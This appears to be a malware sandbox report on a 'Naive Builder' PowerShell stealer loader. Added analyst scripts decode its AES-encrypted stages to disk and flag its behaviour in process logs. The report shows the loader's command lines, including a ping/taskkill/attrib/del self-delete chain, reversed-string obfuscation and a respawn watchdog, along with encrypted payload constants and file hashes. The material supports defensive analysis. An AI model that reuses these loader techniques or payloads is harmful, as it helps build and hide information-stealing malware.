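The script below is added analyst tooling, not part of this report and not the sample's own code. It reimplements the visible decode path exactly, minus the Assembly.Load step, so stages land on disk as files and are never executed; it prints the decrypted stage-2 constants rather than asserting their values, since the report does not show the plaintexts. The key/IV values are copied from the command lines and are build-specific; the file paths in the usage comment and the registry value text (which you must supply from a hive export of the infected host) are assumptions. Run it only inside an isolated analysis VM.

```powershell
# Added analyst tooling; not part of the sandbox report or of the sample. Reproduces the decode
# path visible in the two command lines above (Base64 -> AES-CBC/PKCS7 -> GZip) but writes each
# stage to disk instead of reaching [System.Reflection.Assembly]::Load, so nothing is executed.
# Use only inside an isolated analysis VM: the input .bat is the live sample.

# Key/IV pairs copied from the command lines: stage 1 = "Naive Builder.bat.exe", stage 2 = $sxr-powershell.exe
$Stage1Key = 'EJfVxric5nYI0sCifeM7QtCynXluiHdjC3MMcb2UUrA='; $Stage1IV = 'IIC8RBkY6uF/2e5D1cUgfg=='
$Stage2Key = '4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='; $Stage2IV = 'DauoXLeOSueRq0nIbPJeGw=='

function ConvertFrom-ReversedName([string]$s) {
    # The loader spells .NET member names backwards, e.g. 'gnirtS46esaBmorF'[-1..-16] -join ''
    -join $s[-1..-$s.Length]   # 'kcolBlaniFmrofsnarT' -> TransformFinalBlock
}

function Unprotect-SxrAes([byte[]]$Cipher, [string]$KeyB64, [string]$IvB64) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [Convert]::FromBase64String($KeyB64)   # 32 bytes, so AES-256
    $aes.IV  = [Convert]::FromBase64String($IvB64)    # 16 bytes
    $dec = $aes.CreateDecryptor()
    try { $plain = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length); return ,$plain }
    finally { $dec.Dispose(); $aes.Dispose() }
}

function ConvertFrom-SxrBlob([string]$B64, [string]$KeyB64, [string]$IvB64) {
    # Full stage transform: Base64 -> AES decrypt -> GZip inflate -> raw bytes (a .NET PE when it is a stage)
    $plain = Unprotect-SxrAes ([Convert]::FromBase64String($B64)) $KeyB64 $IvB64
    $in  = New-Object System.IO.MemoryStream(,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes
}

function Save-SxrStage([byte[]]$Bytes, [string]$Path) {
    [System.IO.File]::WriteAllBytes($Path, $Bytes)
    $sha  = [System.Security.Cryptography.SHA256]::Create().ComputeHash($Bytes)
    $isPe = $Bytes.Length -gt 2 -and $Bytes[0] -eq 0x4D -and $Bytes[1] -eq 0x5A   # 'MZ'
    '{0}  {1} bytes  PE={2}  SHA256={3}' -f $Path, $Bytes.Length, $isPe, (($sha | ForEach-Object { $_.ToString('x2') }) -join '')
}

function Expand-SxrBatch([string]$BatPath, [string]$OutDir = '.') {
    # Stage 1 reads its own .bat, takes the first line that starts with ':: ', skips four
    # characters and splits the rest on '\' into two Base64 blobs under the stage-1 key/IV.
    $line = [System.IO.File]::ReadAllText($BatPath) -split "`r?`n" | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $line) { throw "no ':: ' payload line in $BatPath" }
    $i = 0
    foreach ($blob in $line.Substring(4).Split('\')) {
        Save-SxrStage (ConvertFrom-SxrBlob $blob $Stage1Key $Stage1IV) (Join-Path $OutDir "stage1_part${i}.bin"); $i++
    }
}

function Expand-SxrRegistryValue([string]$ValueText, [string]$OutDir = '.') {
    # Stage 2 does not touch the .bat again: it reads one registry string value (hive, key and value
    # names are themselves AES-encrypted constants; see Get-SxrStringConstants), splits it on '\' and
    # decodes both halves under the stage-2 key/IV. Pass the value text taken from a hive export.
    $i = 0
    foreach ($blob in $ValueText.Split('\')) {
        Save-SxrStage (ConvertFrom-SxrBlob $blob $Stage2Key $Stage2IV) (Join-Path $OutDir "stage2_part${i}.bin"); $i++
    }
}

# Encrypted string constants from the $sxr-powershell.exe command line, in order of appearance.
# They resolve the registry read ($GZsVo.$Vsxgi(...).$iskZf(...)), the single-instance check
# (get-process $uQajJ3), the entry-point call ($EYBYD.$uQajJ0) and the loader class ($HWqkc::$uQajJ2).
$Stage2Strings = [ordered]@{
    uQajJ='R8YHI2y3+bfC/arKVq+DpA=='; ZldVv='zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc='
    QHSJO='yRagRVP7Y0yIRGNXut/wRA=='; EAKnT='XmPKocLK/8SmKmaO5JmdsA=='; iskZf='poxV0MP0jpPLCq8Z3pitYA=='
    Vsxgi='fMjPiDDtGwwKHRObVzT45g=='; GZsVo='uCGw99xaYYIE7Jybam7tCw=='; VYaHm='ZD1IRjg+BO+p2yRt7mUxgQ=='
    uQajJ0='Vv8TsP5rPt+SM413bEOWhA=='; uQajJ1='pmT31TTl/lRidgabhJZB0Q=='; uQajJ2='nHishQEgCf6Wrip0Vd5NBw=='
    uQajJ3='EHH0aLIupLRmFvkxYHYafA=='
    # $qPAwu is a PowerShell fragment the loader pipes to IEX; print it, never run it.
    qPAwu='3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c='
}

function Get-SxrStringConstants {
    foreach ($k in $Stage2Strings.Keys) {
        $plain = Unprotect-SxrAes ([Convert]::FromBase64String($Stage2Strings[$k])) $Stage2Key $Stage2IV
        [pscustomobject]@{ Variable = '$' + $k; Value = [System.Text.Encoding]::UTF8.GetString($plain) }
    }
}

# Usage (paths are placeholders for your case directory):
#   Expand-SxrBatch 'C:\cases\naive\Naive Builder.bat' -OutDir C:\cases\naive\out
#   Get-SxrStringConstants | Format-Table -AutoSize -Wrap
#   ConvertFrom-ReversedName 'txeTllAdaeR'    # ReadAllText
```

The two 50-character strings passed to EntryPoint.Invoke in both stages ('idTzn...', 'LkIzM...') are the loaded assembly's command-line arguments; the report does not show what the assembly does with them, so record them alongside the extracted stages. Note that stage 1 calls Substring(4) on a line whose marker ":: " is three characters long, so one extra byte is skipped; the extractor mirrors this rather than "fixing" it, because a different offset would break the Base64 decode.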
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:2872
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3280
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Kills process with taskkill
PID:3024
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Views/modifies file attributes
PID:5240
-
-
-
-
-
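The cmd.exe subtree above is the loader's cleanup: ping localhost -n 8 as a roughly seven-second sleep, taskkill of the stage-1 host, attrib -h -s to strip the hidden and system attributes it had set on itself, then del /f. Together with the earlier entries this tree gives three process-creation patterns worth alerting on: PowerShell host switches issued by an image that is not powershell.exe (here "Naive Builder.bat.exe" and C:\Windows\$sxr-powershell.exe), the reversed-string member-name idiom in the command line, and the GetProcessById(...).WaitForExit() respawn watchdog.

The script below is an added example, not part of this report: triage rules over process-creation records (Sysmon event 1 or Security 4688 with command-line auditing), plus an on-disk check that a flagged image is a renamed PowerShell host. The record field names (ProcessId, Image, CommandLine) and the sample records are constructed here, with command lines shortened from the ones in this tree and a benign control record whose PID (4321) is made up; map the field names to your own log schema.

```powershell
# Added example, not part of the sandbox report. Triage rules for process-creation records covering
# the behaviours visible in this tree. Field names and sample records are constructed (command lines
# trimmed from the process tree above); map them to your own log schema before use.

$PsHosts = 'powershell.exe', 'powershell_ise.exe', 'pwsh.exe'
# PowerShell host switches; two or more on a non-PowerShell image suggest a renamed/copied host
$PsSwitch = '(?i)\s-(?:nop(?:rofile)?|nologo|noni(?:nteractive)?|w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass|c(?:ommand)?\s|enc(?:odedcommand)?\s)'
# Reversed-literal idiom used for every .NET member name in this loader: 'gnirtS46esaBmorF'[-1..-16] -join ''
$ReversedName = "'[A-Za-z0-9]+'\[-1\.\.-\d+\]\s*-join\s*''"
# Watchdog: wait for a sibling PID, sleep, then re-run the same payload (third $sxr-powershell.exe instance)
$Watchdog = 'GetProcessById\(\d+\)\.WaitForExit\(\)'

function Test-SxrProcessRecord($Record) {
    $image   = [System.IO.Path]::GetFileName($Record.Image)
    $cl      = [string]$Record.CommandLine
    $reasons = @()
    if ($PsHosts -notcontains $image -and [regex]::Matches($cl, $PsSwitch).Count -ge 2) {
        $reasons += "PowerShell switches from non-PowerShell image '$image'"
    }
    if ($cl -match $ReversedName) { $reasons += 'reversed-string member-name obfuscation' }
    if ($cl -match $Watchdog)     { $reasons += 'waits on another PID then relaunches (watchdog)' }
    if ($image -ieq 'cmd.exe' -and $cl -match '(?i)\bping\b.*&.*\btaskkill\b.*&.*\bdel\b') {
        $reasons += 'delayed self-delete chain (ping, taskkill, del)'
    }
    if ($cl -match '(?i)\battrib\s+-h\s+-s\b') { $reasons += 'clears hidden/system attributes before delete' }
    if ($reasons) { [pscustomobject]@{ PID = $Record.ProcessId; Image = $Record.Image; Reasons = $reasons -join '; ' } }
}

function Find-SxrSuspiciousProcesses($Records) { foreach ($r in $Records) { Test-SxrProcessRecord $r } }

function Test-RenamedPowerShell([string]$Path) {
    # On-disk confirmation for a flagged image: a copied powershell.exe keeps OriginalFilename
    # 'PowerShell.EXE' in its version resource whatever it was renamed to. Returns $null if absent.
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $vi = (Get-Item -LiteralPath $Path).VersionInfo
    return ($vi.OriginalFilename -ieq 'PowerShell.EXE') -and ($PsHosts -notcontains [System.IO.Path]::GetFileName($Path))
}

# Constructed records (command lines shortened from the process tree above; PID 4321 is a made-up benign control)
$SampleRecords = @(
    [pscustomobject]@{ ProcessId = 1056; Image = 'C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe'
        CommandLine = '"Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mJkVt($luVLu){ $XURkq.Key=[System.Convert]::(''gnirtS46esaBmorF''[-1..-16] -join '''')(''...''); }' }
    [pscustomobject]@{ ProcessId = 2408; Image = 'C:\Windows\$sxr-powershell.exe'
        CommandLine = '"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3288).WaitForExit();[System.Threading.Thread]::Sleep(5000); function GwNqo($hcWdd){ $GbeQA.Key=[System.Convert]::(''gnirtS46esaBmorF''[-1..-16] -join '''')(''...''); }' }
    [pscustomobject]@{ ProcessId = 928; Image = 'C:\Windows\System32\cmd.exe'
        CommandLine = '"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"' }
    [pscustomobject]@{ ProcessId = 4321; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -NoProfile -Command Get-Date' }
)

Find-SxrSuspiciousProcesses $SampleRecords | Format-Table -AutoSize -Wrap
# Flags 1056 (switches, reversed names), 2408 (switches, reversed names, watchdog) and 928 (self-delete, attrib); 4321 is not listed.
# For a real export: Import-Csv .\procs.csv | ForEach-Object { Test-SxrProcessRecord $_ }
```

The switch rule deliberately requires two or more PowerShell switches and a non-PowerShell image name, so a stray "-c" in an unrelated tool does not fire; the reversed-literal regex is the most specific of the four, since `'...'[-1..-N] -join ''` has no legitimate reason to appear in a process command line. Test-RenamedPowerShell is the confirmation step for the first rule and needs access to the image on disk, which the taskkill/del chain above removes, so run it against the dropped copy in C:\Windows\ or a forensic image rather than the live host.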
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3796
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4076
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4148
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4352
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:976
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4204
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2292
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:2668
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3308
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:4504
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 87d4b16173db5bcf2e3d6a477e70a004 9DfgcGP1gEO8fhm2owkT6A.0.1.0.0.01⤵PID:3552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1196
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:1936
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:3388
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:4632
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4560
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3856
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5920
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 445KB
MD5: 2e5a8590cf6848968fc23de3fa1e25f1
SHA1: 801262e122db6a2e758962896f260b55bbd0136a
SHA256: 9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3
SHA512: 5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8
-
Filesize: 3KB
MD5: 4838ee953dab2c7a1bf57e0c6620a79d
SHA1: 8c39cd200f9ffa77739ff686036d0449984f1323
SHA256: 22c798e00c4793749eac39cfb6ea3dd75112fd4453a3706e839038a64504d45d
SHA512: 066782b16e6e580e2861013c530d22d62c5ba0f217428cc0228ad45b855e979a86d2d04f553f3751cf7d063c6863cb7ea9c86807e7f89c7e0ae12481af65af76
-
Filesize: 3KB
MD5: 8e64ab95d5d2c4c1e7a757624cb1fffa
SHA1: 9889f93ad60bacb07683b4a23c40aa32954646d8
SHA256: dff8902430dcae2fba05fc7f54157c4bc8a7445ed488c1d5727947a0c07075d6
SHA512: 3ecc166686c1d7d61e91ec972244118980bf626a88123b87136695ac206e159933ad9f9feb3fd565713dd5d99038f427b845637c51a57497f0ac716de3a7973c
-
Filesize: 3KB
MD5: c6086d02f8ce044f5fa07a98303dc7eb
SHA1: 6116247e9d098b276b476c9f4c434f55d469129c
SHA256: 8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA512: 1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a
-
Filesize: 3KB
MD5: 39b9eb9d1a56bc1792c844c425bd1dec
SHA1: db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256: acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512: 255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51
-
Filesize: 2KB
MD5: 4ac1741ceb19f5a983079b2c5f344f5d
SHA1: f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA256: 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512: 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd
-
Filesize: 2KB
MD5: a9124c4c97cba8a07a8204fac1696c8e
SHA1: 1f27d80280e03762c7b16781608786f5a98ff434
SHA256: 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512: 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392
-
Filesize: 1.8MB
MD5: 7873612dddd9152d70d892427bc45ef0
SHA1: ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256: 203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512: d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize: 52KB
MD5: 9ef28981adcbf4360de5f11b8f4ecff9
SHA1: 219aaa1a617b1dfa36f3928bd1020e410666134f
SHA256: 8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512: ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize: 162KB
MD5: a366d6623c14c377c682d6b5451575e6
SHA1: a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA256: 7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512: cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11